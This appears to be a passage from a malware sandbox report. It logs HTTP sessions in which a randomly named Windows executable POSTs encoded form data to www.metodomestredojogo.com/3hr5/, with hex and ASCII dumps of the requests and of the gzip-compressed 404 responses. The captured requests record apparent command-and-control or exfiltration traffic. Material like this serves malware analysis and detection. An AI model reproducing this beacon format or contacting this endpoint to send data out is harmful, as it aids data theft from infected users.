                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              67192.168.11.2050198108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:06.558710098 CET1171OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 45 5a 76 46 43 6a 70 56 61 78 45 7a 4f 66 63 6d 4c 47 4b 6d 50 7a 4e 58 2b 4a 57 6f 59 32 39 56 48 44 31 44 44 45 58 73 7a 2b 42 4f 61 42 61 57 38 65 4e 4f 74 58 69 65 51 48 44 31 58 42 66 44 53 75 37 6d 34 6b 34 50 31 73 74 49 75 53 4a 42 4c 4d 72 56 2f 74 36 65 63 50 44 70 59 53 34 6f 48 48 66 31 39 62 36 73 37 4f 44 6b 79 7a 38 41 51 65 58 78 57 6a 74 4f 73 65 74 56 79 75 35 34 61 72 4a 51 52 31 33 57 34 72 34 36 6c 76 7a 7a 4e 49 6f 42 76 6d 5a 71 74 42 55 77 2b 31 34 72 2b 74 53 43 59 56 74 31 35 62 4d 44 54 58 4b 53 74 45 45 75 47 59 4f 33 74 33 33 55 48 2f 5a 49 39 74 51 32 55 51 53 54 7a 68 39 69 4b 61 44 44 34 70 67 4d 7a 49 64 76 49 72 6c 64 62 6a 42 2f 58 4b 38 2f 75 35 76 6f 52 58 55 6c 2f 51 70 4b 68 4c 6b 71 55 72 75 38 32 38 59 46 41 5a 74 36 48 67 79 35 62 53 70 43 37 77 37 4b 69 61 70 41 7a 38 75 6b 54 6c 2b 55 58 4b 69 72 37 45 67 6f 4b 75 5a 33 59 52 74 64 71 30 69 72 42 52 46 58 73 6d 34 5a 4c 30 55 2f 4d 38 46 2b 56 69 58 33 55 69 4b 47 6c 30 35 4b 67 61 54 58 2b 6d 6d 76 68 4e 76 4e 7a 34 4e 52 67 6c 58 52 44 36 75 6f 6c 4b 48 78 35 70 64 43 79 58 58 79 37 49 50 6d 72 53 4d 34 51 4d 6a 63 33 57 45 69 78 70 4d 6c 46 34 78 57 51 5a 66 73 6b 51 44 74 57 66 39 33 69 6d 63 52 39 54 61 71 4f 51 31 76 67 4e 57 48 36 79 36 59 66 45 6c 46 54 30 77 67 57 52 66 57 2b 4a 71 64 30 2b 73 4f 65 33 6a 64 32 4d 6e 77 2b 34 44 35 76 63 49 72 5a 77 4f 67 6e 5a 43 4f 64 67 47 39 4e 64 2b 6c 4d 51 32 6e 74 36 2b 42 6c 4c 38 4a 31 69 67 44 36 75 4c 2f 58 55 43 2f 49 49 53 64 34 69 47 67 55 7a 6e 64 43 77 72 2b 6d 64 71 7a 78 42 4d 3d
                                                                                                                              Data Ascii: TZd=EZvFCjpVaxEzOfcmLGKmPzNX+JWoY29VHD1DDEXsz+BOaBaW8eNOtXieQHD1XBfDSu7m4k4P1stIuSJBLMrV/t6ecPDpYS4oHHf19b6s7ODkyz8AQeXxWjtOsetVyu54arJQR13W4r46lvzzNIoBvmZqtBUw+14r+tSCYVt15bMDTXKStEEuGYO3t33UH/ZI9tQ2UQSTzh9iKaDD4pgMzIdvIrldbjB/XK8/u5voRXUl/QpKhLkqUru828YFAZt6Hgy5bSpC7w7KiapAz8ukTl+UXKir7EgoKuZ3YRtdq0irBRFXsm4ZL0U/M8F+ViX3UiKGl05KgaTX+mmvhNvNz4NRglXRD6uolKHx5pdCyXXy7IPmrSM4QMjc3WEixpMlF4xWQZfskQDtWf93imcR9TaqOQ1vgNWH6y6YfElFT0wgWRfW+Jqd0+sOe3jd2Mnw+4D5vcIrZwOgnZCOdgG9Nd+lMQ2nt6+BlL8J1igD6uL/XUC/IISd4iGgUzndCwr+mdqzxBM=
                                                                                                                              Dec 4, 2023 15:27:06.802052021 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:06 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f 5e 3c df 67 d6 c5 ef 49 37 c0 ef a8 3f d8 39 b7 77 ce bd 9d 33
                                                                                                                              Data Ascii: RrG}} A,o1Z9$9r0"U}mV7n$-Js9{,s !d;G20D)U`sC")f,0]Q"8+9e*\|?*SUa0>[ZaxJ|$o@O?DUJN],;S1p8&LDqE1f%l,/dWPn@jpb9g5L_i"dbSELE^({!OO<PX}bRAo]:R,7Gs&b9.9dcH4kgB53Z|?[}\G,]/?Nz/^,~XXvUC<,TAe^<wx[K]b81]3PB92M_Z& @!xLO-7XK4gT-8]IQuRHReK|0'c7FT4ql{8(Ml$Qjnn6y1,5"U4V;3aIX&pj704O,_0_xrD1-5n<(9S(AhecWyzx~54kY1;BG9SNg*mE<D=v>Sv*LJk|nO?UMv/^<gI7?9w3
                                                                                                                              Dec 4, 2023 15:27:06.802133083 CET1340INData Raw: d4 e7 0f f6 26 e9 6e e0 77 92 f7 22 ed 3b 91 de 9d 08 3c dc 07 a1 9b a7 e5 0a 20 93 97 6c bd 83 9d 49 2d 67 98 86 3b f4 26 eb 4d 6c 5e db 3b af 9b 59 0e 15 4e 0e 16 36 6f 56 e8 e1 d6 31 d3 b5 63 66 54 11 35 76 0a 81 65 4c 40 ec 3c 1f 9b 65 0e 72
                                                                                                                              Data Ascii: &nw";< lI-g;&Ml^;YN6oV1cfT5veL@<erJ!rBH>%LhCETRNuN^1kp2iXyWRXC;vZs;~/0/GfKyC9;FNzS; v Urlt< )5Z44hP
                                                                                                                              Dec 4, 2023 15:27:06.802189112 CET1340INData Raw: 45 93 94 a1 d0 eb 74 3a 9b d8 e9 54 0a e3 6a f6 07 8c 42 2f 6c f7 20 bb d9 b2 b6 93 5d 5c 54 dc af 77 d6 bf 26 b9 33 48 1d 95 dd cd 6f 95 4d b8 9c a0 d3 ea 24 9d c8 78 79 ed ba 88 ef e6 0a 34 18 b7 52 c5 45 3e 88 3e 22 df 04 e5 e7 b4 36 27 5a 52
                                                                                                                              Data Ascii: Et:TjB/l ]\Tw&3HoM$xy4RE>>"6'ZR(t:N}<e0gZ~srqg6o0>of,vM<^eW(H*CclD%,Ij JU0}0I> {DYm!}wIsz2?#6fZME#b
                                                                                                                              Dec 4, 2023 15:27:06.802244902 CET1340INData Raw: 0f dc 03 50 76 a8 e9 bc 9e 83 e9 14 57 40 97 4f 02 d9 6f 56 83 37 4f 99 81 27 81 94 1d 0e 79 24 67 e2 69 3a 6d ba 1c dc ab 82 f8 49 08 9b 2e 35 08 bc c8 98 90 c5 1a 4a 2a 2a 92 a7 a9 55 db f1 61 64 9a 4d 40 7d 49 e0 b2 61 1d 2e 4b 52 83 66 01 10
                                                                                                                              Data Ascii: PvW@OoV7O'y$gi:mI.5J**UadM@}Ia.KRf+<s~!f\Yil_lAP9PUVDjsqYYq=)..?~y|Vr&>OMm*?3/2&dT0"&X4Xsqr
                                                                                                                              Dec 4, 2023 15:27:06.802300930 CET1340INData Raw: 43 bb b6 c8 84 cb e8 ea 02 ed 8e 34 d6 4d d7 9d 6c 57 96 d1 04 d6 dd 6e f1 39 25 98 6c 30 8a 6c 2d 62 ae b0 e3 05 8e 9c ca d8 85 85 01 85 98 2d 92 48 99 70 b8 98 e2 d0 2e 08 3a e1 10 b7 88 bd 5d c4 4c e7 9c 2e 5d 3d a7 b9 73 7e f4 ec d9 b3 5d c1
                                                                                                                              Data Ascii: C4MlWn9%l0l-b-Hp.:]L.]=s~]L-*}k7_v0vC?R2!vmr8Dzj_:<i/*oE_0XEe,*~`~vbS1Nd$GPJn%mu#Vhp7)-\
                                                                                                                              Dec 4, 2023 15:27:06.802345991 CET530INData Raw: 18 b4 36 65 22 b1 41 aa 14 24 54 c4 d2 f3 3c e7 a6 55 8e 74 81 53 08 cd a9 81 0b 83 23 d9 e6 0a 7e 2f 70 9d f1 2a e0 7c 2c 82 00 4e 48 91 91 88 66 b9 24 72 82 56 a0 c6 86 a7 1d c5 a4 e5 25 66 28 c0 a6 e2 47 31 2b 8b 42 8c d9 e7 09 e3 1c 39 ac 9f
                                                                                                                              Data Ascii: 6e"A$T<UtS#~/p*|,NHf$rV%f(G1+B9P>k1+{Nl_DkyNAe*0l\ mfPxYPmC8D%F38M{[HCcR%aAB:SZpsq+V1(3t*'/*S{;U^)


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              68192.168.11.2050199108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:09.199676991 CET6484OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 45 5a 76 46 43 6a 70 56 61 78 45 7a 4f 66 63 6d 4c 47 4b 6d 50 7a 4e 58 2b 4a 57 6f 59 32 39 56 48 44 31 44 44 45 58 73 7a 2b 4a 4f 61 55 57 57 39 39 6c 4f 75 58 69 65 5a 6e 44 32 58 42 65 66 53 75 6a 69 34 6b 31 30 31 71 68 49 74 42 42 42 4c 2b 54 56 75 64 36 66 54 76 44 76 54 79 35 76 48 48 54 70 39 62 75 38 37 2f 48 6b 7a 7a 73 41 62 50 58 32 65 54 74 4d 73 65 74 6e 6b 65 35 4b 61 72 4d 4e 52 31 37 57 34 6f 4d 36 72 39 37 7a 65 76 45 42 6f 32 5a 70 6e 68 55 42 6c 46 34 53 2b 74 47 77 59 56 74 6c 35 61 59 44 54 51 2b 53 73 46 45 74 47 34 4f 33 67 58 33 58 4e 76 46 45 39 74 64 78 55 54 4f 54 7a 69 39 69 59 71 44 44 6f 59 67 50 30 6f 64 74 5a 37 6b 48 66 6a 4e 6e 58 4f 55 46 75 39 33 6f 51 6e 51 6c 2b 6e 46 4b 6e 61 6b 71 64 72 75 2b 35 63 59 57 5a 4a 74 6d 48 67 69 6c 62 53 4a 6f 37 33 44 4b 6a 37 4a 41 6c 39 75 6e 44 31 2b 4f 4f 36 6a 68 70 30 6b 30 4b 74 68 7a 59 52 73 51 71 32 4f 72 42 41 56 58 74 69 4d 65 4d 6b 55 43 47 73 46 72 66 43 62 48 55 69 6e 46 6c 31 78 67 67 5a 2f 58 2b 47 6d 76 78 38 76 43 35 49 4e 6f 76 46 58 44 4d 61 76 75 6c 4b 62 54 35 74 4e 38 78 6a 66 79 36 34 66 6d 76 43 4d 35 62 4d 6a 59 69 47 45 65 67 35 4d 6c 46 34 39 43 51 5a 54 73 6e 68 37 74 58 6f 52 33 77 6c 45 52 37 54 62 68 4f 51 30 78 67 4d 71 30 36 79 79 32 66 45 55 6f 54 32 38 67 56 44 6e 57 39 49 71 53 6b 2b 73 48 49 48 69 45 72 38 72 6a 2b 34 66 68 76 63 34 37 5a 48 65 67 6d 59 79 4f 4c 51 48 72 62 74 2b 69 4c 51 33 75 37 36 44 43 6c 4c 49 2f 31 6a 6b 54 36 74 37 2f 61 69 4c 33 4d 36 4f 71 6e 44 4f 4f 58 6e 44 57 45 67 33 79 79 38 6a 77 74 32 59 6c 48 74 4c 79 35 4e 58 69 62 52 50 77 43 39 74 66 41 67 66 52 79 35 64 6d 74 76 69 4d 78 48 69 37 68 4a 59 30 53 43 4a 45 76 75 68 63 6c 4d 77 56 31 35 5a 65 6a 53 55 71 4d 4b 34 39 63 77 43 2b 4b 46 61 4a 44 32 51 51 41 33 59 51 70 4a 5a 64 39 4a 34 6d 76 62 54 56 7a 33 54 4d 55 69 58 73 57 54 35 52 79 39 41 75 70 52 6c 4d 46 2b 44 5a 33 67 32 32 59 31 73 59 4a 35 6f 6e 50 63 7a 68 77 31 77 32 43 67 39 39 39 78 33 70 30 48 2f 6f 42 4f 61 76 42 4c 2f 75 51 43 45 63 33 59 4c 70 39 6d 31 4d 4c 31 70 77 36 6b 55 32 48 72 47 41 38 56 50 4e 42 34 4a 66 51 46 30 5a 2b 45 76 39 55 32 70 54 49 48 35 69 53 32 6a 74 56 4f 64 49 39 7a 32 4e 39 48 4d 43 53 72 5a 32 73 54 6d 2f 77 2f 33 66 77 79 33 45 4b 53 52 58 48 4b 66 62 32 46 38 62 54 6b 4c 2b 61 77 52 39 41 4b 38 49 41 76 41 76 41 41 70 53 4f 79 57 50 5a 4e 59 57 6c 34 4c 2f 61 43 39 47 76 62 57 30 33 76 36 6d 38 33 44 34 6a 30 34 34 36 58 78 70 6e 46 50 6f 44 35 4e 4b 41 78 58 36 2b 46 38 33 51 52 68 39 7a 58 49 51 59 6d 65 67 78 35 2b 79 64 30 5a 64 62 6a 77 37 42 6b 32 6a 52 34 2f 73 59 57 61 7a 46 75 64 36 55 58 70 38 5a 77 2f 35 46 4a 4d 6e 4b 5a 33 66 35 70 33 73 48 6f 75 70 58 6a 2f 6b 50 34 59 34 31 73 71 6e 47 52 34 33 32 54 74 55 34 31 50 39 2b 2b 32 33 67 64 73 31 5a 54 5a 49 47 69 54 4c 42 50 46 5a 67 66 70 7a 4c 32 31 52 78 6d 35 74 58 54 36 59 68 78 61 65 2f 53 57 70 4e 65 47 44 66 44 66 49 6a 30 46 75 32 52 39 68 67 6f 50 77 55 6f 6a 49 54 45 4d 4a 61 4e 76 4a 6d 66 4f 53 77 71 53 73 66 2f 6d 37 69 4a 64 44 39 42 67 65 77 36 58 78 69 30 4c 37 70 55 6d 56 55 66 41 36 2f 61 36 6d 4e 46 4e 6e 65 65 42 65 45 51 6f 4f 4f 4f 6b 32 71 41 71 49 4b 4d 48 63 4e 66 38 77 4d 59 39 63 78 50 30 7a 58 45 65 69 65 38 4f 32 4b 35 79 43 72 50 4c 48 4b 62 47 66 4a 7a 41 32 4b 76 4f 4a 64 36 47 37 4a 76 43 33 59 35 4b 71 48 58 48 36 6d 53 53 71 79 4f 4c 76 7a 41 5a 6e 7a 34 75 6c 65 73 32 6c 44 44 51 6d 58 44 61 51 61 55 49 32 4e 62 68 65 42 55 72 79 6c 47 70 6c 68 4d 56 33 4a 5a 45 37 57 67 48 5a 31 6f 50 38 2b 5a 44 64 32 69 6b 66 58 5a 4d 6f 63 30 65 72 6f 6d 71 6d 37 52 36 33 38 4c 78 34 67 76 77 35 46 73 6a 76 71 51 31 67 52 52 6f 35 70 4a 6b 51 61 61 61 61 59 57 66 65 63 46 75 72 4d 4c 42 76 41 6c 71 78 6b 5a 6f 71 46 65 6f 48 4f 39 47 2b 4d 52 44 45 72 39 53 69 44 4b 70 47 30 4a 50 51 42 6e 53 48 5a 45 50 30 72 77 77 43 6d 42 53 79 72 54 46 6f 72 79 66 48 45 47 4d 30 45 59 56 2b 73 51 42 69 53 30 78 6e 43 72 35 68 55 58 72 32 70 2b 59 54 30 71 4e 42 69 4b 6f 75 56 47 6d 30 67 58 44 48 34 42 31 69 6f 6f 6b 61 75 6e 31 5a 70 76 32
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:27:09.199759960 CET6484OUTData Raw: 4e 33 43 31 7a 42 72 51 34 6b 75 76 32 37 62 38 32 4c 6d 5a 55 2b 69 55 6f 76 7a 73 65 38 39 66 6f 37 32 74 54 41 6f 38 2b 54 6e 47 6d 42 74 46 65 32 43 6f 6d 46 2f 70 76 47 64 59 6e 52 4b 46 36 44 77 46 79 71 68 65 63 35 7a 62 2f 61 46 64 36 61
